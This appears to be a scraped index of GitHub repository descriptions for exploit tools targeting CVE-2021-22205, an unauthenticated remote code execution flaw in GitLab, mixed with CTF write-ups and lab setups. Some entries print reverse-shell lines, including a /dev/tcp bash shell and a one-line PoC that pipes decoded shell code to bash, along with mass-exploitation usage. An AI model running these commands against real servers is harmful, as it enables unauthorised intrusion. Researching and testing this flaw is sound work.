CVE-2021-22205

CVE-2021-22205 RCE

CVE-2021-22205 CVE-2021-22205 RCE 工具仅用于分享交流，切勿用于非授权测试，否则与作者无关 -R string VPS to load tools eg: -R 127001:8083 -T string Tool name eg: -T fscan -c string exec cmd eg: -c "id" (default "id") -host string reverse shell host -m string Method for using of CVE

Xiaoli-Tools Some scripts and Nuclei templates which I think are useful Table of content Overview Overview wmi-PS (wmi password spraying) gitlab-RCE (CVE-2021-22205) ecshop addcomputer-dpersist (with AD persistence option) sunlogin-fuzz (sunlogin remote desktop toolset RCE)

CVE-2021-22205 This is the deployment for Gitlab Enterprise Edition (1395) that is vulnerable to CVE-2021-22205 using Docker container Description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Requirement:

A CVE-2021-22205 Gitlab RCE POC written in Golang

Golang-CVE-2021-22205-POC A bare bones CVE-2021-22205 Gitlab RCE POC written in Golang which affects Gitlab CE/EE < 13103 Gitlab CE/EE < 1396 Gitlab CE/EE < 1388 I've been wanting to learn Golang for a while I decided to write a POC for CVE-2021-22205 in Golang to help familiarize myself with the language Please disregard what I am assuming is

将Goby的json格式Poc转为xray的yaml格式Poc

pocGoby2Xray 将Goby的json格式Poc转为xray的yaml格式Poc。 Goby和Xray是深受网络安全爱好者（包括本人）使用的社区/商业化的渗透测试工具，在Nemo项目中也集成了调用Xray进行Poc扫描。pocGoby2Xray的初衷是通过“翻译”两种工具的Poc规则和语法后进行“转换”，方便统一使用Xray的调用Poc�

CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Vuln Product Gitlab CE/EE < 13103 Gitlab CE/EE < 1396 Gitlab CE/EE < 1388 Environment export GITLAB_HOME=/srv/gitlab sudo d

gitlab version

import requests import json import time name = "repositories/gitlab/gitlab-ce" def query_gitlabce_tags(): all_tags = [] query_tag_url = "hubdockercom/v2/repositories/gitlab/gitlab-ce/tags/?page_size=100&page=1" while query_tag_url: resp = requestsget(query_tag_url) resp_json = jsonloads(resptext) tag_results = [i[&quo

gitlab version index

Gitlab version index 版本号索引 主要分为 gitlab-ee (931个) 和 gitlab-ce (934个) 可以从v2接口爬取tags，大概10页 hubdockercom/v2/repositories/gitlab/gitlab-ee/tags/?page_size=100&page=1 hubdockercom/v2/repositories/gitlab/gitlab-ce/tags/?page_size=100&page=1 0x01 分析 ╭─root@u

CVE-2021-22205未授权漏洞批量检测与利用工具

0x01 前言 ⚠️声明:本项目仅供学习和交流使用，请勿用于非法未授权测试！ 更新记录 112 增加了一键反弹shell功能 优化了相关流程 111 增加了批量检测 文本中可以直接使用ip检测，不需要写协议 1030 增加了burp代理池 重写了命令行参数 增加了gitlab未授权批量以及单个检测功能 影响�

CVE-2021-22205

CVE-2021-22205 的批量检测脚本

Gitlab-CVE-2021-22205 CVE-2021-22205 的多线程批量检测脚本 使用 dnslog 可配合 poc 检测 使用多线程进行检测 可自定义命令执行

CVE-2021-22205 Gitlab 未授权远程代码执行漏洞 EXP, 移除了对djvumake & djvulibre的依赖，可在win平台使用

CVE-2021-22205 基于 mr-r3bot/Gitlab-CVE-2021-22205 的Fork 简介 CVE-2021-22205: Gitlab 未授权远程代码执行漏洞 EXP 移除了对djvumake & djvulibre的依赖，直接内部生成payload，可在win平台执行。 使用方法 # 需要授权 python3 exploitpy -u <username> -p <password> -t <gitlab_url> -c <

Write-up of THUCTF 2022

THUCTF Write-Up by 4E1A607A Mobile checkin 科学上网上Discord, 在announcements上面有flag test your nc 连上nc survey 填完问卷, base64解码 Misc 小可莉能有什么坏心思呢？ 3张图, 用图片查看器 (没有alpha channel) 打开可以识别3组, 用stegsolve (可能有alpha channel) 又识别出两组, 最后一组扔Word里面调亮度 flagmarket_level1

PoC in single line bash

GitLab-preauth-RCE_CVE-2021-22205 single line bash PoC for GitLab preauth RCE ( CVE-2021-22205 ) t="vulnsite";cmd='echo xxx_base64_of_reverse_shell_code_xxx |base64 -d|bash';f="1jpg";echo 41542654464f524d000003af444a564d4449524d0000002e81000200000046000000acffffdebf992021c8914eeb0c071fd2da88e86be6440f2c7102ee49d36e95bda2c3223f464f524d00000

CVE-2021-22205 Gitlab CE/EE < 13103 Gitlab CE/EE < 1396 Gitlab CE/EE < 1388 Usage: 验证漏洞：python 22205exppy -u url -v 执行命令：python 22205exppy -u url -c command 批量验证：python 22205exppy -f filename Reference: githubcom/Al1ex/CVE-2021-22205

A repository of breaches of AWS customers

Background Security is an exercise in managing risk Reviewing the common root causes of security incidents is an effective way to guide prioritized remediation efforts This repository seeks to index all publicly disclosed AWS customer security incidents with a known root cause It will exclude incidents involving exposed data stores (eg S3 bucket leaks, exposed managed or ho

THUCTF 2022 Writeup 本次比赛单人组队，作为一次“现场学习能力大赛”，通过网上到处学习，计解出题目 23 道， 总分 7618。以下简要按题目的分类给出本人解题的思路，附录中则辑录了使用的所有脚本 代码以及赛场上被证明是失败的一些尝试。本文的代码由 Org-mode 生成，可以在

GitLab-CVE-2021-22205-scanner Usage $~ python3 GitLab-revshellpy -u gitlabtargetcom -l [AttackerIP] -p [AttackerPort] Credit hackeronecom/reports/1154542 Referred code snippet from here: githubcom/CsEnox/Gitlab-Exiftool-RCE/blob/main/exploitpy Disclaimer: The script is for security analysis and research onl

GitLab-RCE-CVE-2021-22205RCE图形化工具 使用python编写已编译为EXE文件 使用方式： 命令执行时需要添加dnslog地址进行回显，建议使用ceye平台 回显时间可能较久

Pocsuite3 For CVE-2021-22205

CVE-2021-22205 Pocsuite3 For CVE-2021-22205,未授权RCE。

Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Affected Version Gitlab CE/EE < 13103 Gitlab CE/EE < 1396 Gitlab CE/EE < 1388 Vuln Impact Soon Reference githubc

基于python利用爬虫从fofa获取数据，需要使用会员cookie或API

FOFA数据采集工具 fofa_crawler 一、简介 fofa_crawler 这个工具基于python实现，使用爬虫获取数据，有爬虫模式和api模式两种模式，对于有api使用权限的用户可以使用api模式这会更加高效，对于没有FOFA API使用权限的用户可以使用爬虫模式，使用爬虫模式需要提供用户自己的cookie。还可以对FOFA收

CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本： Gitlab CE/EE < 13103 Gitlab CE/EE < 1396 Gitlab CE/EE < 1388 Usage python3 CVE-2021-22205py target "curl \`whoami\`dnslog" 获取csrf-token： 通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身�

CVE-2021-22205-getshell

CVE-2021-22205-getshell CVE-2021-22205-getshell 测试版本 构造生成漏洞利用的命令 echo 'bash -i >& /dev/tcp/1921681475/4444 0>&1' > /tmp/1sh chmod +x /tmp/1sh /bin/bash /tmp/1sh 利用djvumake生成漏洞利用的图片 import os payloads=[ "echo 'bash -i &

GitLab CE/EE Preauth RCE using ExifTool

CVE-2021-22205 GitLab CE/EE Preauth RCE using ExifTool This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself All developers and all contributors of this tool do no

This repository is made for my submission of the final project in CS 4770

Break it down! Traditionally, the goal of CTFs are trying to find hidden pieces of information, or activate some piece of code in order to export information This is a bit different The goal here is to bring down your target as quickly as possible Seems simple, right? It may not be as easy as you might think! This CTF revolves around CVE-2021-22205, a Gitlab exploit involvi

Automated Gitlab RCE via CVE-2021-22205

Automated-Gitlab-RCE Automated Gitlab RCE via CVE-2021-22205 examplepy GitlabURL AttackerIP Added shell via python socket and pre-loaded commands to pop an RCE Main payload used from githubcom/Al1ex/CVE-2021-22205

CVE-2021-22205 检测脚本,支持getshell和命令执行

CVE-2021-22205 由于Gitlab未正确验证传递到文件解析器的图像文件从而导致命令执行。攻击者可构造恶意请求利用该漏洞在目标系统执行任意指令，最终导致Gitlab服务器被控制。由于网上大多缺少反弹shell，故修改了网上写的脚本，增加了一键getshell功能 影响版本 119 <= GitLab（CE/EE）&

A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab

gitlab-cve-2021-22205 A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab Usage Usage: cve-2021-22205sh [options] Options: -h,--help Show this help -t,--target Set the target server (ie "gitlabexamplecom") -i,--reverse-ip Set the IP to connect back to -p,--reverse-port Set the port to connect back to -c,--comman

HS-CTF-22 Helt Sikker CTF 2022 Challenges Web Vaccine - SQLi Girl Scouts - Cookie modification Bradley Urglar's API - Insecure direct object reference (from NAV IT) Repo - CVE-2021-22205 gitlab RCE Protectr - robotstxt Inspector Gadget - Flag in page source Crypto Long lost message - Playfair cipher Hexadecimal - Hex to ASCII Exclusive Or - XOR with known key Mario 64

Gitlab CE/EE RCE 未授权远程代码执行漏洞 POC && EXP CVE-2021-22205

CVE-2021-22205 Description POC for CVE-2021-22205: Gitlab CE/EE RCE 未授权远程代码执行漏洞 POC && EXP create by antx at 2021-10-29 Detail An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command

a Curated list of gitlab vulnerability

Gitlab-CVE a Curated list of gitlab vulnerability CVE-2021-22205 [critical] An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution targetcom/users/sign_in CVE-2021-22214 [